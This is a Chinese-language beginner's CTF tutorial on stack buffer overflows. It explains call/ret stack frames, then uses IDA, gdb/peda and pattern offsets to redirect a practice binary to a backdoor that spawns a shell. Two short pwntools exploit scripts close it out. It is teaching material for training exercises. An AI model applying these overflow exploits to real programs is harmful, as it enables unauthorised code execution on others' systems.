CTF-Pwn入门及栈溢出原理解释

”Pwn”是一个黑客语法的俚语词，是指攻破设备或者系统。发音类似“砰”，对黑客而言，这就是成功实施黑客攻击的声音——砰的一声，被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介，而我个人理解的话，应该就是向目标发送特定的数据，使得其执行本来不会执行的代码，前段时间爆发的永恒之蓝等病毒其实也算得上是pwn的一种。

1. 准备阶段

这里介绍一些在接下来的教程中用到的工具

ida——交互式反汇编器专业版（Interactive Disassembler Professional），人们常称其为IDA Pro，或简称为IDA。是目前最棒的一个静态反编译软件

peda——PEDA是Long Le在Blackhat2012黑帽会议中放出的Python脚本工具，它可以辅助黑客编写EXP，可以运行在Unix/linux系统上。

gdb——UNIX及UNIX-like下的调试工具

pwntools——pwntools是一个CTF框架和漏洞利用开发库，用Python开发，由rapid设计，旨在让使用者简单快速的编写exploit。

这些软件的安装教程都可以在百度或者谷歌搜索得到，这里就不一一介绍了

2. 初步分析

点击此处下载例子

首先我们用ida打开这个文件

在左边的列表找到main函数，双击，

可以看到main函数的内容

然后点击右边的汇编代码，按下Tab或者F5，可以看到汇编代码翻译成了c语言

再双击vulnerable_function

可以看到，这个函数非常简单，只是单纯的读取一串字符，然后储存到buf里面

但是

开辟的缓存区只有0x48个字节大小，但是read最多可以读取0x100个字节，这样就会造成缓存区溢出。

那知道了有缓存区溢出，我们究竟要怎么利用呢？

不用着急，接下来我会详细的介绍如何利用。

3.原理解释

首先，我们引入栈帧的概念。（知道栈帧的可以跳过这一部分）

平时，我们写c / c++ 代码的时候经常会用到函数，那究竟函数在底层如何实现呢？

就拿我们上面那个文件来说，在main函数那里，调用了vulnerable_function

在汇编代码下面是这样的

那么call 这个指令做了什么呢？

具体是

(1)将当前的EIP压入栈中（EIP寄存器存放下一个CPU指令存放的内存地址）

(2)转移

还没执行call 时程序的内存如下图

esp：寄存器存放当前线程的栈顶指针

ebp：寄存器存放当前线程的栈底指针

执行call之后的内存如下图

这里的0x0000067A是call vulnerable_function的下一条指令储存的位置

然后下一步就是执行vulnerable_function里面的内容

首先是

push ebp，把main函数的栈底指针压入栈

然后

mov ebp,esp , 把esp的内容传送到ebp那里（实在不知道怎么描述。。。）

push ebx ，把ebx压入栈

sub esp, 44h ，把esp减去0x44，实际上是开辟缓存区

call __x86_get_pc_thunk_ax

add eax, 19D9h 这两个指令暂时先无视

sub esp, 4 和上面一样

执行完这些命令后，内存如下图

假设程序正常运行，执行到

还记得上面函数开始的时候那几个压栈操作吗，这里就是把东西从栈中还原

mov ebx, [ebp+var_4] 这句就不解释了，很简单

leave ，这个指令等价于 mov esp,ebp ，pop esp，

执行到这里再看一下内存

然后下一条指令就是ret，等价于pop eip，也就是执行完pop eip之后，下一步就是执行0x0000067F处的代码

最后返回main函数之后就变成

跟call vulnerable_function之前的内存状态一模一样

这里为了避免误会，特地说一下，图上的main函数还有vulnerable_function的栈帧其实也算是栈的一部分！！！

4.实战开始

解释完函数的调用过程之后，我们回到正题

在ida左边的函数列表中，我们可以找到

一个后门函数，会执行system("/bin/sh");

这个函数的开始地址为0x00005F0

我们的目的就是利用栈溢出，控制程序运行这一个函数

接下来跟着我一步一步做

首先把程序放到linux下面，然后打开控制台，输入gdb ./tutorial1 （或者gdb tutorial1的位置）

这里默认已经安装好了准备阶段所说的插件或者软件

然后输入pattern_create 150

会显示类似下图

然后把除了开头和结尾的引号的所有内容复制

然后输入 r，把刚才复制的内容粘贴进去

再回车

然后就会变成类似下图的状况

这个时候你一定很想吐槽，这里的Program received signal SIGSEGV (fault address 0x41344141) 又是什么鬼，（手动黑人问号？？）

还记得我们上面原理解释所说的东西吗，这里的栈溢出其实就是把保存在栈中的 ebp ,ebx ,0x0000067F 全部给覆盖掉，可以拉上一点，看一下寄存器的东西

EBP变成我们输入的内容了，而这里的0x41344141其实就是覆盖掉了0x0000067F，代码指示说执行0x41344141处的代码，但是系统说臣妾做不到啊，0x41344141不知道什么鬼东西啊，我执行不下去啊，于是就发出哀号，然后我们就看到Program received signal SIGSEGV (fault address 0x41344141)了，这个时候，我们就相当于用输入的东西，控制了程序。

这时候在控制台输入pattern_offset 0x41344141

这样，我们就可以快速得知，esp到保存0x0000067F的地方一共有76个字节，所以我们只要输入76个任意东西，再加上后门的地址，就可以控制程序执行后门函数

新建一个python代码文件，输入下面的代码，#后面的东西只是注释，可以不输入

from pwn import *

p=process('./tutorial1') #打开本地程序

ret_addr=0x800005F0 #后门地址，这里地址跟上文有些不同，因为在ida中的地址和实际运行的地址有稍微一些差别

payload='a'*76+p32(ret_addr) #76个a再加上后门地址

p.sendline(payload) #发送payload

p.interactive() #开启交互模式

p.close() #关闭

运行这个python代码，就可以看到出现了$号，输入ls等命令也能成功执行，一般的题目都会在本地放一个flag文件，cat flag.txt之后就可以得到flag

---------------------------------------------------我是分界线---------------------------------------------------------------------------------------------------------------

上面的附件可能有点问题，在本地的话后门地址应该会不同，导致利用失败

http://pan.baidu.com/s/1bQUoGI

这个附件应该是可以正常pwn掉的，python代码大体还是一致的，只是改了下文件名，后台地址，还有缓冲区长度

from pwn import *

p=process('./overflow_tmp')

back_addr=0x804846B

payload='a'*52+p32(back_addr)

p.sendline(payload)

p.interactive()

p.close()

整个教程到这里的结束了，如有不妥之处请指正，谢谢